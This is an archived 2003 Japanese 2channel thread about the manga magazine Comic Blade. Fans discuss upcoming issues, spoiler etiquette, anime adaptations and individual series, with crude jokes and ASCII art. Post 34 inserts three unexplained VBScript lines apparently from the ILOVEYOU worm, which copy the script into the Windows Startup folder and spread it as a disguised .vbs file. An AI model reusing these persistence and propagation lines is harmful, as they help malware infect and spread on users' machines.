2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

俺達にはコミックブレイドだけ!12月号

1 : ◆KwwKqCiKD6 :03/04/20 23:37 ID:NEQva4gV
★先月号/R指定上等なのはコミックブレイドだけ!十一月号
  http://comic2.2ch.net/test/read.cgi/ymag/1046097016/

☆マッグガーデン発行の月刊「コミックブレイド」(毎月30日発売)について語るスレです
☆基本的に 【マターリ&sage進行推奨】 です、煽りや厨には反応せず徹底放置してください
☆ネタバレや感想羅列はブレイド公式発売日の正午以降が望ましいと思われます

★公式サイト
  マッグガーデン    /http://www.mag-garden.co.jp/
  スクウェア・エニックス/http://www.square-enix.co.jp/

★過去ログや関連スレは以下のログ倉庫と>>2-5あたりを参照してください
  http://www.geocities.co.jp/AnimeComic-Name/5804/blade.html

2 : ◆KwwKqCiKD6 :03/04/20 23:38 ID:NEQva4gV
★過去ログ
  桜野みねねの散り様が分かるのはコミックブレイドだけ!一月号
  http://comic.2ch.net/ymag/kako/1007/10079/1007969382.html
  パンゲアはどうした!?コミックブレイド二月号
  http://comic.2ch.net/ymag/kako/1014/10144/1014478868.html
  株式半分エニに掌握されてるのはコミックブレイドだけ!三月号
  http://comic.2ch.net/ymag/kako/1016/10162/1016250222.html
  連載陣が安定しているのはコミックブレイドだけ!4月号
  http://comic.2ch.net/ymag/kako/1018/10185/1018522367.html
  描き手も読み手も痛いのはコミックブレイドだけ!五月号
  http://comic.2ch.net/ymag/kako/1020/10204/1020443308.html
  ENIXから横取り40萬はコミックブレイドだけ!六月号
  http://comic.2ch.net/ymag/kako/1022/10225/1022550087.html
  雑誌が闇鍋状態なのはコミックブレイドだけ!七月号
  http://comic.2ch.net/ymag/kako/1025/10257/1025709701.html
  http://corn.2ch.net/ymag/kako/1025/10257/1025709701.html ※未HTML化
  看板漫画をゴーストが描くのはコミックブレイドだけ!八月号
  http://corn.2ch.net/ymag/kako/1030/10308/1030806085.html ※未HTML化
  ダメな感じで男女平等なのはコミックブレイドだけ!九月号
  http://comic2.2ch.net/ymag/kako/1035/10352/1035297661.html
  切れ味が竹光なのはコミックブレイドだけ!十月号
  http://comic2.2ch.net/ymag/kako/1039/10395/1039532036.html ※未HTML化
  R指定上等なのはコミックブレイドだけ!十一月号
  http://comic2.2ch.net/ymag/kako/1046/10460/1046097016.html ※未HTML化

3 :作者の都合により名無しです:03/04/20 23:49 ID:ScDXAIk7
おつかるちゃー

4 :作者の都合により名無しです:03/04/20 23:53 ID:BpLLR1pO
>>1
乙!
そういやロキCMにヨーコちゃん出ないと言われてたけど
ちゃんと出てるよね?   ・・・最後に

5 :作者の都合により名無しです:03/04/21 00:35 ID:oDsGPXa/
1さん乙です。発売日まで後10日か...


6 :作者の都合により名無しです:03/04/21 01:15 ID:xuhJ18kl
>1
乙彼っすー

泣いても笑っても死なない限り発売日は来るんだよな…
俺、日韓合同大賞に応募したんだが次号発表なんだよ(ガクブル
誰か他に応募した香具師はおらんか…?

7 :作者の都合により名無しです:03/04/21 01:22 ID:Fu4vKIbH
1先生、おつー(某スレの影響

しかしここに来てるのにここ2〜3ヶ月ブレイド見てないのは・・・。
見ようと思っても行きつけの本屋にないと探さないしなぁ。

8 :作者の都合により名無しです:03/04/21 01:37 ID:VKk7ZDWr
乙カレー

9 :作者の都合により名無しです:03/04/21 02:06 ID:l/3eqNAZ
http://comic2.2ch.net/test/read.cgi/ymag/1050849074/24

10 :作者の都合により名無しです:03/04/21 09:43 ID:ooemT/kl
1さん乙
ええタイトルや・・・・

11 :作者の都合により名無しです:03/04/21 17:38 ID:0asKX3l1
>>1さん乙彼〜!

>>10
ああ、本当に良いスレタイだな・・・。

12 :作者の都合により名無しです:03/04/21 18:41 ID:3kwRPWfQ
これで本誌の漫画が良けれ(ry

13 :新潟県人 ◆3uy7V1zaws :03/04/22 21:02 ID:g01IoPxt
単行本買いたい漫画があるのはブレイドの方なんだけど
反面、全体的に楽しめてるのが何故かゼロサムの方。

読み飛ばしの理由がちょっと特殊な天外レトロを除いても
なんか読み飛ばす漫画がポチポチ増えてきた…。

14 :作者の都合により名無しです:03/04/22 21:18 ID:vl0Ve0Qg
ゼロサムは知らん

私的購入雑誌
・ブレイド
・ガム
・週間ジャンプ
・ガンガンパワード
・サムソン

イヤッホーゥ

15 :作者の都合により名無しです:03/04/22 22:12 ID:DWiNxCKW
ようやくブレイドコミックが全部揃った─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─ !!!
なんだか本棚が愉快なことになってますよ?

16 :作者の都合により名無しです:03/04/22 22:23 ID:460ud8gQ
>>15
全部あるんですか!?すごい・・・
私なんて初回限定本3冊しかないよ・・・

17 :作者の都合により名無しです:03/04/23 06:30 ID:Ba8QoDWt
>>15にはブレイドコミックスだけ!

18 :作者の都合により名無しです:03/04/23 15:08 ID:fkBKJcIj
授業中にジンキ読んでたら没収された漏れは逝ってよしですか?

19 :作者の都合により名無しです:03/04/23 16:42 ID:DT/1OxqM
没収したジンキでハァハァしている教師は逝ってよしですか?

20 :作者の都合により名無しです:03/04/23 17:59 ID:HmXCltIu
藻前ら退学と懲戒免職じゃ

21 :作者の都合により名無しです:03/04/23 18:23 ID:KejqsD5n
僕と彼女のXXXは内容よりもタイトルがエロいと思うのは漏れだけか?

22 :作者の都合により名無しです:03/04/23 18:23 ID:EH5MEAwp
>>15
神降臨!!!いや、神より、漢か?

23 :作者の都合により名無しです:03/04/23 18:37 ID:3ZDDSUaI
>>15
凄いね・・・あきれた(笑)

24 :作者の都合により名無しです:03/04/23 22:56 ID:WXJCVAx6
しかし何かの最終回みたいなスレタイだな。

25 :作者の都合により名無しです:03/04/23 22:57 ID:aZf43gZl
保坂先生の次回作にご期待下さい。

26 :作者の都合により名無しです:03/04/23 23:18 ID:VqcaHTwh
だれだ

27 :作者の都合により名無しです:03/04/23 23:31 ID:aZf43gZl
>26
株式会社マッグガーデンの代表取締役社長、保坂嘉弘さんの事。

【保坂の略歴】
1984年、株式会社エニックス入社。
ゲームプロデューサーを経て、出版事業創設に参画。
コミック部門を立ち上げ。
「月刊少年ガンガン」や「月刊Gファンタジー」等のコミック雑誌を創刊。
以後、「南国少年パプワくん」「魔法陣グルグル」「まもって守護月天!」「最遊記」「ジャングルはいつもハレのちグゥ」等、
TVアニメプロジェクトをプロデュース。
2001年、エニックス取締役出版事業部長を退任。
株式会社マッグガーデンを設立。

28 :作者の都合により名無しです:03/04/24 02:19 ID:xdBZwIrE
         ラブ
ブレイド、即ち愛!!

29 :作者の都合により名無しです:03/04/24 11:27 ID:hsZtRrHW
>>21
漏れもだ。
この題名のせいで友達に紹介しにくい漫画No.1だ。

30 :作者の都合により名無しです:03/04/24 17:13 ID:1+pgCFzC
必殺、アルティメットブレイドオオオォォォ!!







が発動される前に廃刊なヨカーン

31 :作者の都合により名無しです:03/04/24 22:12 ID:UC/YFIPU
>>29
僕と彼女のXXX(トリプルエックス)と紹介するんだ!

32 :作者の都合により名無しです:03/04/24 22:48 ID:/gkCYBTf
>>28の前には
        バトル
ブレイド、即ち闘!!

と入れるべきなのか。

33 :作者の都合により名無しです:03/04/26 12:52 ID:QsfwR7O/
「パパは名探偵!?」良かったよぉ 。・゚・(ノД`)・゚・。

それはそうと、ブレイドってかなりやばい状態なのかな?
E’SはGファンタジーの15秒CMが2回。
ロキはブレイドの30秒CMが2回。
ブレイドのCMが増えれば増える分、スポンサーのCMで得られる金は減るんだよな。
スポンサーなど要らんほど儲かっているのか(有り得ない)、
CMから得られる金を犠牲にしてまで本誌をアピールしなくてはならない状態なのか。

アニメの話の進み方も、早々に女性ファンを得ようとしているように見えてきた。
次回はフレイが出るというのに、レイヤはまだ出てきていない。
ヘムも出番が早まったし。
男性陣で女性ファン獲得→ブレイドとか単行本を買わせる→ウマー(゚Д゚)  なのかなぁ?

34 :作者の都合により名無しです:03/04/26 13:13 ID:KZ4AweP9
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

35 :作者の都合により名無しです:03/04/26 15:30 ID:Qz3o8rfJ
早売りGet

36 :作者の都合により名無しです:03/04/26 15:35 ID:fZ9rjvgV
>>35
詳細希望

37 :作者の都合により名無しです:03/04/26 17:11 ID:+820Okkl
レイプは未遂だがお兄ちゃんに会うまでは汚されたくない発言など美味し過ぎる

38 :作者の都合により名無しです:03/04/27 15:49 ID:XKZaUEle
浮上

39 :作者の都合により名無しです:03/04/27 18:36 ID:eiD5HEiB
順調に沈降。

( ̄ー ̄)ニヤソ。新スレッドストリッパ。そうはい神崎^^

40 :作者の都合により名無しです:03/04/28 02:01 ID:/haiesUd
>35
日韓合同漫画大賞の結果教えてくだちぃ

41 :40:03/04/28 04:19 ID:7HTp2Wkd
ネタバレ発売当日まで禁止ですたね

吊ってきます…スマソ

42 :作者の都合により名無しです:03/04/28 04:27 ID:f2TFiBVI
ネタバレ禁止なのはマンガの内容についてですよ
マンガ賞や次号予告、ページ数、休載などについては解禁前でもOKです。

43 :作者の都合により名無しです:03/04/28 07:04 ID:iRSqhSFo
前スレ使うのはどうか。埋めついでに。

44 :35:03/04/28 16:36 ID:TFEeigUG
>>40
前スレに書いておきました。見たところで意味無いけど…

45 :作者の都合により名無しです:03/04/28 19:15 ID:7HTp2Wkd
>44
サンクス!
ああ…また一ヶ月待つのか…鬱だ…

46 :作者の都合により名無しです:03/04/28 19:58 ID:VGMU0ROT
>>45
お前さん、前スレに書かれてる意味分かってないだろ…

47 :作者の都合により名無しです:03/04/28 20:19 ID:9OrHQAAN
っていうかもうこっちに書いてもええやんと思うが。
この程度のネタバレ(とすら言わないような)。

48 :作者の都合により名無しです:03/04/28 20:46 ID:EM2OhG/M
>42 作者の都合により名無しです 03/04/28 04:27 ID:f2TFiBVI
>ネタバレ禁止なのはマンガの内容についてですよ
>マンガ賞や次号予告、ページ数、休載などについては解禁前でもOKです。

これがすべてじゃないかと。
マンガ賞がどうのって興味ない人には関係ないしバラされて怒る人はいないだろう

49 :作者の都合により名無しです:03/04/28 22:22 ID:p+wax2i2
>マンガ賞がどうのって興味ない人には関係ないしバラされて怒る人はいないだろう
ま、そうなんだが、だからといってネタバレしていいのかというと、
それはまた別の問題であるわけで。

50 :作者の都合により名無しです:03/04/28 22:41 ID:EM2OhG/M
>>49
つまりこのスレ(12月号)からそういうネタバレは不可と・・・?
このスレの>>1はそういうつもりでネタバレ不可って書いたんじゃないと思うが・・・

51 :50:03/04/28 22:49 ID:EM2OhG/M
とりあえずエニ統一スレと同じようにこのスレも
>ネタバレ禁止なのはマンガの内容について
でいいと思うんだが

漫画の内容*以外*のこと書いても普通ネタバレとは言わんし

52 :作者の都合により名無しです:03/04/29 05:07 ID:r+5POu7K
「ヤバイよ今月の漫画大賞○○○が○○○○だって!」
こんな書き込み誰か怒ります?

53 :作者の都合により名無しです:03/04/29 15:27 ID:AEublESm
「ヤバイよ今月の漫画大賞みねねが審査員長だって!」

>52
面白いからOK

54 :新潟県人 ◆Jy53BOlark :03/04/29 16:59 ID:kl8yMIu0
>>52
エニ統一スレが出来てから2年(と1ヶ月)、ブレイドスレもその数ヶ月後に立ったけど
怒った人なんてただの一度も見た事ない。(ワラ

55 :作者の都合により名無しです:03/04/29 18:51 ID:++flONnJ
近所の本屋にいまだに五月号が平積みされてますヨ。
明日大丈夫だよな…

56 :作者の都合により名無しです:03/04/29 22:55 ID:/3eWGnIi
いつも前日販売の本屋においてない…

売り切れたのか?

57 :作者の都合により名無しです:03/04/29 23:40 ID:V14NSyhB
>>53
生きてたのか。(社会的に)

58 :作者の都合により名無しです:03/04/30 00:04 ID:EiCLktzA
>>57
ラグナロクの中でな(生きてる)。

59 :作者の都合により名無しです:03/04/30 12:26 ID:M7dL91Qm
今月もレイープ満載ですた

60 :作者の都合により名無しです:03/04/30 16:08 ID:KLDmZXUG
今から買ってきます。コンビニにおいて無いと不便だなあ…

61 :作者の都合により名無しです:03/04/30 16:32 ID:Jh7HkeDI
ダメだ…先月の「清村」からどうしても悪魔借りに笑いを見出だしちまう。
719ページでワロタよ…

62 :作者の都合により名無しです:03/04/30 17:55 ID:DLQqhTUB
>>61
思い出させるな馬鹿野郎ヽ(`Д´)ノ
あぁもうギャグ漫画にしか見えない…

63 :作者の都合により名無しです:03/04/30 20:26 ID:1Q++JAXc
悪魔狩りといえば残念ながら予想が当たらなかったこと〜

ラファエルの剣の1本がレブナント戦で折れてたんで再生するかと思ったけどしなかった。
ラハブが魔法をかけといたいわくつきの一品なのに・・・

64 :作者の都合により名無しです:03/04/30 20:26 ID:qTCaXuQ5
今回の聖カトレアはいまいちだった・・・
 毒舌とか先生の苦悩が面白気なのにぃ
「てんてぇ〜♥ミキのお願い聞いてぇ」
 「はいはい、何かなミキちゃん?」
「わたし・・・てんてぇの・・・」
 「あっ!もうそろそろ帰る時間だね!さようなら!」

ってな会話が結構好きさ!

・・・んで、ヨーコちゃんには今月も会えなかったよ

65 :作者の都合により名無しです:03/04/30 21:41 ID:z4CM5qwh
ロリコン氏ね

この世から消えうせろ

66 :作者の都合により名無しです:03/04/30 22:17 ID:Yshf1BOe
    r;;;;;ノヾ
    ヒ‐=r=;' ロリコンは滅びぬ、何度でもよみがえるさ!!
    'ヽ二/

67 :作者の都合により名無しです:03/04/30 22:57 ID:z4CM5qwh
人がゴミであると見抜く事など容易い。

            /ヘ;;;;;r
     r;;;;;ノヾ.   ';=r=‐リ
     ヒ‐=r=;'    ヽ二/´  流石だな私たちは。
     'ヽ二/   /  ⌒i
    /   \     | |
    /    / ̄ ̄ ̄ ̄/ |
  __(__ニつ/ Laputa / .| .|____
      \/____/ (u ⊃

68 :作者の都合により名無しです:03/04/30 23:13 ID:1k2Hwbxx
今回はアレまでもそっち方面でしたね。。。

69 :作者の都合により名無しです:03/04/30 23:14 ID:YnF7vFm3
なんだよ!気になるじゃん!

70 :作者の都合により名無しです:03/04/30 23:29 ID:RDV68HOt
今月エロ満載だな。
でも漏れは伊賀ずきん萌え。

71 :作者の都合により名無しです:03/05/01 00:20 ID:o7ft9moQ
伊賀ずきんって隔月なんだな
            ∧_∧
     ∧_∧  (´<_`  )
     ( ´_ゝ`) /    ⌒i どんどん微妙な月刊誌になっていくな
    /    \      | |  
    /    / ̄ ̄ ̄ ̄/| | 
  __(__ニつ/  FMV  /__| |____
      \/____/ (u ⊃

72 :作者の都合により名無しです:03/05/01 00:24 ID:hCP1Li+r
伊賀ずきん、漏れ的にはダメだった…あれでよく連載もらえたなと思ってしまった。
ギャグゴマ多くて見づらい。もっと丁寧に描いて欲スィ。
デビュー作が一番良かったな〜

73 :作者の都合により名無しです:03/05/01 00:52 ID:QtLxbRzp
>>72
丁寧に師匠を描けと?

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)